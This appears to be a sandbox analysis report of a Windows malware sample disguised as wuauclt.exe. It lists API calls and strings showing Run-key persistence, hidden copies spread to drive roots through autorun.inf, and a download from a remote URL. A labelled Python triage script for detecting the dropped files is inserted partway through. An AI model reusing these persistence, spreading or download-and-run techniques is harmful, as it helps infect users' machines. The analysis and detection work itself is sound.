                                                                            control_flow_graph 1093 40288c-4028a0 1094 4028a2-4028a3 1093->1094 1095 4028ad-4028c3 1093->1095 1096 4028c5-4028d4 1094->1096 1097 4028a5-4028a6 1094->1097 1098 4028ec-4028fe 1095->1098 1103 4028e5 1096->1103 1101 4028d6-4028e0 1097->1101 1102 4028a8 1097->1102 1099 402904-40291c CreateFileA 1098->1099 1100 4029b6-4029d3 1098->1100 1104 402922-40292a 1099->1104 1105 402a2a-402a35 GetLastError 1099->1105 1107 4029d5-4029d7 1100->1107 1108 4029d9-4029df 1100->1108 1101->1103 1106 402a14-402a15 1102->1106 1103->1098 1112 402930-40293e GetFileSize 1104->1112 1113 4029f3-4029f9 1104->1113 1105->1106 1109 4029e7-4029ef GetStdHandle 1107->1109 1110 4029e1-4029e3 1108->1110 1111 4029e5 1108->1111 1109->1105 1115 4029f1 1109->1115 1110->1109 1111->1109 1112->1105 1114 402944-402949 1112->1114 1116 402a12 1113->1116 1117 4029fb-402a04 GetFileType 1113->1117 1118 40294b 1114->1118 1119 40294d-40295a SetFilePointer 1114->1119 1115->1113 1116->1106 1120 402a16-402a28 CloseHandle 1117->1120 1121 402a06-402a09 1117->1121 1118->1119 1119->1105 1122 402960-40297c ReadFile 1119->1122 1120->1106 1121->1116 1123 402a0b 1121->1123 1122->1105 1124 402982 1122->1124 1123->1116 1125 402984-402986 1124->1125 1125->1113 1126 402988-402990 1125->1126 1127 402992-402993 1126->1127 1128 402995-4029a4 SetFilePointer 1126->1128 1127->1125 1128->1105 1129 4029aa-4029b2 SetEndOfFile 1128->1129 1129->1105 1130 4029b4 1129->1130 1130->1113
                                                                            APIs
                                                                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402914
                                                                            • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402938
                                                                            • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402954
                                                                            • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000), ref: 00402975
                                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 0040299E
                                                                            • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 004029AC
                                                                            • GetStdHandle.KERNEL32(000000F5), ref: 004029E7
                                                                            • GetFileType.KERNEL32(?,000000F5), ref: 004029FD
                                                                            • CloseHandle.KERNEL32(?,?,000000F5), ref: 00402A18
                                                                            • GetLastError.KERNEL32(000000F5), ref: 00402A30
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                            • String ID:
                                                                            • API String ID: 1694776339-0
                                                                            • Opcode ID: 853191b5a63ddb20695847c52630ab1a0d0f08debd7bc4a84206ca039e1fbc7e
                                                                            • Instruction ID: c08e0bc1a52ce57edfd428ff71f0c6be874f716b93af5554cff537b7abe3d1e7
                                                                            • Opcode Fuzzy Hash: 853191b5a63ddb20695847c52630ab1a0d0f08debd7bc4a84206ca039e1fbc7e
                                                                            • Instruction Fuzzy Hash: 1441A2706007009AE731AF288A0D76375D4FB44754F20CA3FE0D6B66E1EAFD98859B5D
                                                                            APIs
                                                                            • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000004), ref: 02311AA2
                                                                            • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000004), ref: 02311AAC
                                                                            • K32EnumProcesses.KERNEL32(00000000,00001000,00000000), ref: 02311ACF
                                                                            • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 02311B1F
                                                                            • FindCloseChangeNotification.KERNEL32(00000000), ref: 02311B23
                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 02311B90
                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 02311B98
                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 02311BA2
                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 02311BB4
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000003.2180435124.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Offset: 02310000, based on PE: true
                                                                            • Associated: 0000002A.00000003.2171747503.0000000002310000.00000004.00000800.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_3_2310000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: Virtual$Free$Alloc$ChangeCloseEnumFileFindModuleNameNotificationProcesses
                                                                            • String ID:
                                                                            • API String ID: 3259292083-0
                                                                            • Opcode ID: 924fc3e4dd7aed06a335e5ee07ce167f7b38cd591f8e6216f861cd618606b93a
                                                                            • Instruction ID: 220a75495074db4dc2e65ff22125ded4b1d3b822ed5e83cdbd26ed3284ce666a
                                                                            • Opcode Fuzzy Hash: 924fc3e4dd7aed06a335e5ee07ce167f7b38cd591f8e6216f861cd618606b93a
                                                                            • Instruction Fuzzy Hash: 23413E75A00218AFDB249F99CC84FEFBBB9EF48754F108065FA49A7290D774DA41CB60

                                                                            APIs
                                                                              • Part of subcall function 00404F84: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00404F97
                                                                              • Part of subcall function 00402728: GetSystemTime.KERNEL32(?), ref: 00402732
                                                                            • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000003), ref: 004067D0
                                                                            • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000003), ref: 0040681F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: ExecuteShellSystem$DirectoryTime
                                                                            • String ID: A}vokwcq*`~f$SVOHOST.exe$kucm$lqrs>*)tsr(gra`lvjhf*fin$lqrs>*)tsr(lj``lvapg*fin
                                                                            • API String ID: 3953870399-2285911871
                                                                            • Opcode ID: 7d1bfde01e10ecbf3750342708e0987b8c15c001d9b85cf4944c029710ffcb01
                                                                            • Instruction ID: 0ed2c2afb193c78c9d8b93d9018a26212a72780c50695523a22b01571590cbab
                                                                            • Opcode Fuzzy Hash: 7d1bfde01e10ecbf3750342708e0987b8c15c001d9b85cf4944c029710ffcb01
                                                                            • Instruction Fuzzy Hash: B7215171601109ABD701FB95D842A9F77BDDF84708F51813BB901BB2C2DABC9E1086A9
                                                                            APIs
                                                                            • LoadIconA.USER32(00000000,00007F00), ref: 00408A4E
                                                                            • LoadCursorA.USER32(00000000,00007F00), ref: 00408A5D
                                                                            • RegisterClassA.USER32(0042AE18), ref: 00408A7A
                                                                              • Part of subcall function 00404414: CreateWindowExA.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040443D
                                                                            • SetTimer.USER32(00000000,00000001,000005DC,004084C8), ref: 00408AD0
                                                                            • TranslateMessage.USER32(0042AE44), ref: 00408AE0
                                                                            • DispatchMessageA.USER32(0042AE44), ref: 00408AE6
                                                                            • GetMessageA.USER32(0042AE44,00000000,00000000,00000000), ref: 00408AF2
                                                                            • KillTimer.USER32(00000000,00007F51,0042AE44,00000000,00000000,00000000,?,?,00408D8D,00000000,00000000,00000000,00000000,00400000,00000000,00000104), ref: 00408B0B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: Message$LoadTimer$ClassCreateCursorDispatchIconKillRegisterTranslateWindow
                                                                            • String ID: bbyb
                                                                            • API String ID: 638683977-2792963345
                                                                            • Opcode ID: 10646b1b30f831aae2ba82a84725ad5e78f7cae3c9c1bad9cc75a6da08a812fc
                                                                            • Instruction ID: 594542fb2c8cde3af6a4fe5998d0340eb89294e9bd4d21e9ef299eea2d4a1429
                                                                            • Opcode Fuzzy Hash: 10646b1b30f831aae2ba82a84725ad5e78f7cae3c9c1bad9cc75a6da08a812fc
                                                                            • Instruction Fuzzy Hash: DF2127B0784701AFE720DF649D82B1237E4AB44700F10853AFA85EF6D2DBB8A8118B5D
                                                                            APIs
                                                                            • GetStdHandle.KERNEL32(000000F5,Runtime error 5 at 00407309,0000001E,?,00000000,?,00403922,?,?,?,00000002,004039C2,00402507,0040254F,00000005,00000000), ref: 0040388D
                                                                            • WriteFile.KERNEL32(00000000,000000F5,Runtime error 5 at 00407309,0000001E,?,00000000,?,00403922,?,?,?,00000002,004039C2,00402507,0040254F,00000005), ref: 00403893
                                                                            • GetStdHandle.KERNEL32(000000F5,004038DC,00000002,?,00000000,00000000,000000F5,Runtime error 5 at 00407309,0000001E,?,00000000,?,00403922), ref: 004038A8
                                                                            • WriteFile.KERNEL32(00000000,000000F5,004038DC,00000002,?,00000000,00000000,000000F5,Runtime error 5 at 00407309,0000001E,?,00000000,?,00403922), ref: 004038AE
                                                                            • MessageBoxA.USER32(00000000,Runtime error 5 at 00407309,Error,00000000), ref: 004038CC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: FileHandleWrite$Message
                                                                            • String ID: Error$Runtime error 5 at 00407309
                                                                            • API String ID: 1570097196-1709220029
                                                                            • Opcode ID: 137e7e66d52ddb4f1bae12f1eb9e43931729fc44793f38aa38c8e49f2c636fe0
                                                                            • Instruction ID: 73fe0ec3fb90fb3f474716323d8876418e50ff0bdbf46fc0c8a6d106d48d8078
                                                                            • Opcode Fuzzy Hash: 137e7e66d52ddb4f1bae12f1eb9e43931729fc44793f38aa38c8e49f2c636fe0
                                                                            • Instruction Fuzzy Hash: 89F09662A8434478E73077615D06F56369C5744F16F20C6BFB260745F2C6BC89C4831E
                                                                            APIs
                                                                            • GetDriveTypeA.KERNEL32(00000000,00000000,0040664A,?,?,?,?,00000000,00000000), ref: 004063BF
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000006,00000000,00000000,0040664A,?,?,?,?,00000000,00000000), ref: 00406420
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000006,00000000,00000006,00000000,00000000,0040664A,?,?,?,?,00000000,00000000), ref: 00406440
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: AttributesFile$DriveType
                                                                            • String ID: \autorun.inf$\sxs.exe$sxs.
                                                                            • API String ID: 1467228633-3893248116
                                                                            • Opcode ID: 71adc7361951f8c7509ea25619efebed4a0e59db825d7e1aa74bc3a9cd434a40
                                                                            • Instruction ID: d7b3d59c00894bd143ef4d30449a3bd145d8bcc858247ddb54af4904dd4dc33d
                                                                            • Opcode Fuzzy Hash: 71adc7361951f8c7509ea25619efebed4a0e59db825d7e1aa74bc3a9cd434a40
                                                                            • Instruction Fuzzy Hash: 4F31D4709002099BDB00FB50C952A9EBB79EF55308F514477E501B72D2C73DAF15C799
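The block above pairs GetDriveTypeA with two SetFileAttributesA calls whose attribute argument is 6 (FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM) and the strings \autorun.inf and \sxs.exe: the usual shape of a worm that drops a hidden, system-flagged copy of itself plus an autorun.inf into each drive root. The Python triage helper below is an added example, not code from the report or from the sample. It parses an autorun.inf for its launch keys and flags root-level files that carry the dropped names and that attribute mask. The autorun.inf text and the directory snapshot it runs on are constructed sample input; the report does not show what the sample writes into autorun.inf. collect_drive_roots() is a Windows-only live collector (GetDriveTypeW through ctypes plus os.stat().st_file_attributes); on any other platform, hand triage_drive() a snapshot.

```python
"""Triage of the removable-drive propagation indicators in the block above.

Added example; not code from the report or from the sample. The file names
come from the block's String ID field and the attribute mask 6 from its
SetFileAttributesA calls. The autorun.inf text below is a constructed sample.
"""
from __future__ import annotations

import configparser
import os
import sys

FILE_ATTRIBUTE_HIDDEN = 0x02
FILE_ATTRIBUTE_SYSTEM = 0x04
HIDDEN_SYSTEM = FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM   # == 6 in the report
DRIVE_REMOVABLE = 2                                             # GetDriveType() value for USB media

DROPPED_NAMES = {"autorun.inf", "sxs.exe"}                      # from the String ID field
LAUNCH_KEYS = ("open", "shellexecute", "shell\\open\\command")  # [autorun] keys that start a binary


def _first_token(value: str) -> str:
    """Executable part of an autorun value: the quoted path, or the first whitespace token."""
    value = value.strip()
    if value.startswith('"') and value.count('"') >= 2:
        return value[1:value.index('"', 1)]
    return value.split()[0] if value else ""


def parse_autorun_targets(inf_text: str) -> list[str]:
    """Every binary an autorun.inf would launch, in file order (duplicates kept)."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str.lower                                  # .inf keys are case-insensitive
    cp.read_string(inf_text)
    targets = []
    for section in cp.sections():
        if section.lower() != "autorun":
            continue
        for key, value in cp.items(section):
            target = _first_token(value)
            if key in LAUNCH_KEYS and target:
                targets.append(target)
    return targets


def triage_drive(root: str, drive_type: int, files: dict[str, int],
                 inf_text: str | None = None) -> list[tuple[str, str]]:
    """files maps root-level names to Win32 attribute masks (a collected snapshot).

    Returns (path, reason) findings: every dropped name, noting whether HIDDEN|SYSTEM
    is set as in the report, plus any autorun launch key that points at such a file.
    """
    findings = []
    by_lower = {name.lower(): attrs for name, attrs in files.items()}
    kind = "removable" if drive_type == DRIVE_REMOVABLE else "non-removable"
    for name, attrs in files.items():
        if name.lower() not in DROPPED_NAMES:
            continue
        if (attrs & HIDDEN_SYSTEM) == HIDDEN_SYSTEM:            # parenthesised: == binds tighter than &
            findings.append((root + name, f"dropped name with hidden+system set on {kind} drive"))
        else:
            findings.append((root + name, f"dropped name, attributes not set, on {kind} drive"))
    if inf_text is not None:
        for target in dict.fromkeys(parse_autorun_targets(inf_text)):   # de-duplicated, order kept
            tname = os.path.basename(target.replace("\\", "/")).lower()
            hidden = (by_lower.get(tname, 0) & HIDDEN_SYSTEM) == HIDDEN_SYSTEM
            if tname in DROPPED_NAMES or hidden:
                findings.append((root + "autorun.inf", f"launch key points at {target}"))
    return findings


def collect_drive_roots() -> dict[str, tuple[int, dict[str, int]]]:
    """Windows-only live collector: GetDriveTypeW plus st_file_attributes of each root entry."""
    if sys.platform != "win32":
        raise RuntimeError("live collection needs Windows; pass triage_drive() a snapshot instead")
    import ctypes
    import string
    kernel32 = ctypes.windll.kernel32
    snapshot = {}
    for letter in string.ascii_uppercase:
        root = f"{letter}:\\"
        drive_type = kernel32.GetDriveTypeW(root)
        if drive_type < DRIVE_REMOVABLE:                        # 0 = unknown, 1 = no root directory
            continue
        files = {}
        try:
            for name in os.listdir(root):
                try:
                    files[name] = os.stat(os.path.join(root, name)).st_file_attributes
                except OSError:
                    pass
        except OSError:
            continue
        snapshot[root] = (drive_type, files)
    return snapshot


# Constructed sample snapshot of one USB stick (not data from the report).
SAMPLE_INF = "[AutoRun]\nopen=sxs.exe\nshellexecute=\"sxs.exe\" -install\n"
SAMPLE_FILES = {"autorun.inf": 0x26, "sxs.exe": 0x26, "notes.txt": 0x20, "Photos": 0x10}

if __name__ == "__main__":
    for path, reason in triage_drive("E:\\", DRIVE_REMOVABLE, SAMPLE_FILES, SAMPLE_INF):
        print(f"{path}\t{reason}")
```

A name match without the attribute mask is still reported, with a weaker reason, so a copy of sxs.exe that an earlier cleanup un-hid is not silently skipped; fixed drives are triaged as well, because the GetDriveTypeA call in the block shows the drive type being checked but not which types are skipped.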
                                                                            APIs
                                                                            • DeleteUrlCacheEntry.WININET(00000000), ref: 0040810F
                                                                              • Part of subcall function 00404F2C: GetWindowsDirectoryA.KERNEL32(?,00000104,?,00407C31,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00404F3F
                                                                            • DeleteFileA.KERNEL32(00000000,00000000,00000000,0040819E,?,00000000,00000000,?,004084B1,?,00000000,?,004084C7,000493E0), ref: 00408132
                                                                            • URLDownloadToFileA.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 00408168
                                                                            • DeleteUrlCacheEntry.WININET(00000000), ref: 0040817E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: Delete$CacheEntryFile$DirectoryDownloadWindows
                                                                            • String ID: bbyb.dll$http://www.xxx.com/qqmsg.txt
                                                                            • API String ID: 2436712417-1998065829
                                                                            • Opcode ID: 3ddb6b2395be871ddeea2fb3607101ab18d3a0cfe0804a7c7e3355ca6e5b914b
                                                                            • Instruction ID: fb79d00d57ea562a78b15d8b1474b2916bd554e92aef79f5ae6ec560df59828f
                                                                            • Opcode Fuzzy Hash: 3ddb6b2395be871ddeea2fb3607101ab18d3a0cfe0804a7c7e3355ca6e5b914b
                                                                            • Instruction Fuzzy Hash: DF11FC70614204AFD700FB65CE42B9A7BBDEF45705F50407AF944BB6E2CB78AE058A6C
                                                                            APIs
                                                                            • Sleep.KERNEL32(000DBBA0,00000000,00407EA2,?,00000000,00000000,00000000,00000000), ref: 00407DEC
                                                                              • Part of subcall function 00404F2C: GetWindowsDirectoryA.KERNEL32(?,00000104,?,00407C31,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00404F3F
                                                                              • Part of subcall function 00404AF8: RegSetValueExA.ADVAPI32(00000000,?,00000000,00000001,?,00000000,00000000,00404B5E), ref: 00404B3D
                                                                              • Part of subcall function 00404AF8: RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?,00000000,00000000,00404B5E), ref: 00404B43
                                                                              • Part of subcall function 00404C18: RegQueryValueExA.ADVAPI32(00000000,?,00000000,00000001,?,00000100,?,?,?,00407E6B,?,00000001,00000000,000DBBA0,00000000,00407EA2), ref: 00404C54
                                                                              • Part of subcall function 00404C18: RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?,00000100,?,?,?,00407E6B,?,00000001,00000000,000DBBA0,00000000), ref: 00404C70
                                                                              • Part of subcall function 004068D0: InternetGetConnectedState.WININET(?,00000000), ref: 004068DF
                                                                            Strings
                                                                            • wuauclt.exe, xrefs: 00407DFC
                                                                            • Microsoft, xrefs: 00407E11
                                                                            • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00407E16
                                                                            • l}+2, xrefs: 00407E36
                                                                            • Wj`wsdtfXHo`vjulbqZTmkblsvZ@qwtfjqPfvvoljYvlhlejavZF|ujlv`t, xrefs: 00407E4C
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: CloseValue$ConnectedDirectoryInternetQuerySleepStateWindows
                                                                            • String ID: Microsoft$Software\Microsoft\Windows\CurrentVersion\Run$Wj`wsdtfXHo`vjulbqZTmkblsvZ@qwtfjqPfvvoljYvlhlejavZF|ujlv`t$l}+2$wuauclt.exe
                                                                            • API String ID: 1219844470-3788782062
                                                                            • Opcode ID: 6665439d985228bc3137df265ac3c46a918ea1d5a36fa6834cb45f0f9932f8f6
                                                                            • Instruction ID: d9744ce1b4bbba914fbef4a0fdf434069bd0e944c21e36a7c6e37f089c0d93f6
                                                                            • Opcode Fuzzy Hash: 6665439d985228bc3137df265ac3c46a918ea1d5a36fa6834cb45f0f9932f8f6
                                                                            • Instruction Fuzzy Hash: C321A1B06152046FD701FBA5D95399E7BA8EF81304F5080BBB500B72D2CBB8BE0086A9
                                                                            APIs
                                                                            • Sleep.KERNEL32(000DBBA0,00000000,00407EA2,?,00000000,00000000,00000000,00000000), ref: 00407DEC
                                                                              • Part of subcall function 00404F2C: GetWindowsDirectoryA.KERNEL32(?,00000104,?,00407C31,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00404F3F
                                                                              • Part of subcall function 00404AF8: RegSetValueExA.ADVAPI32(00000000,?,00000000,00000001,?,00000000,00000000,00404B5E), ref: 00404B3D
                                                                              • Part of subcall function 00404AF8: RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?,00000000,00000000,00404B5E), ref: 00404B43
                                                                              • Part of subcall function 00404C18: RegQueryValueExA.ADVAPI32(00000000,?,00000000,00000001,?,00000100,?,?,?,00407E6B,?,00000001,00000000,000DBBA0,00000000,00407EA2), ref: 00404C54
                                                                              • Part of subcall function 00404C18: RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?,00000100,?,?,?,00407E6B,?,00000001,00000000,000DBBA0,00000000), ref: 00404C70
                                                                              • Part of subcall function 004068D0: InternetGetConnectedState.WININET(?,00000000), ref: 004068DF
                                                                            Strings
                                                                            • wuauclt.exe, xrefs: 00407DFC
                                                                            • Microsoft, xrefs: 00407E11
                                                                            • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00407E16
                                                                            • l}+2, xrefs: 00407E36
                                                                            • Wj`wsdtfXHo`vjulbqZTmkblsvZ@qwtfjqPfvvoljYvlhlejavZF|ujlv`t, xrefs: 00407E4C
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234827317.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_42_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: CloseValue$ConnectedDirectoryInternetQuerySleepStateWindows
                                                                            • String ID: Microsoft$Software\Microsoft\Windows\CurrentVersion\Run$Wj`wsdtfXHo`vjulbqZTmkblsvZ@qwtfjqPfvvoljYvlhlejavZF|ujlv`t$l}+2$wuauclt.exe
                                                                            • API String ID: 1219844470-3788782062
                                                                            • Opcode ID: ce5862bb30728e459670669a0c2fd2858caca85aa9105a01635d79dbd92c1f40
                                                                            • Instruction ID: 3575f48fa22139c18a4af409e614c0b40dd6271191b82a0b2a34aed62443784d
                                                                            • Opcode Fuzzy Hash: ce5862bb30728e459670669a0c2fd2858caca85aa9105a01635d79dbd92c1f40
                                                                            • Instruction Fuzzy Hash: 1C1142B0A15104ABD705FB95D95399E77A9EB84304F5084BBB500B72D2DBBCBE0086AD
                                                                            APIs
                                                                            • RtlEnterCriticalSection.NTDLL(0040A5B0), ref: 004018A9
                                                                            • LocalFree.KERNEL32(00000000,00000000,00401952), ref: 004018BB
                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,00401952), ref: 004018DA
                                                                            • LocalFree.KERNEL32(00000000,00000000,00000000,00008000,00000000,00000000,00401952), ref: 00401919
                                                                            • RtlLeaveCriticalSection.NTDLL(0040A5B0), ref: 00401942
                                                                            • RtlDeleteCriticalSection.NTDLL(0040A5B0), ref: 0040194C
                                                                            Memory Dump Source
                                                                            • Source File: 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000002A.00000002.2234674122.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234707421.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 0000002A.00000002.2234804083.0000000000438000.00000040.00000001.01000000.00000007.sdmp
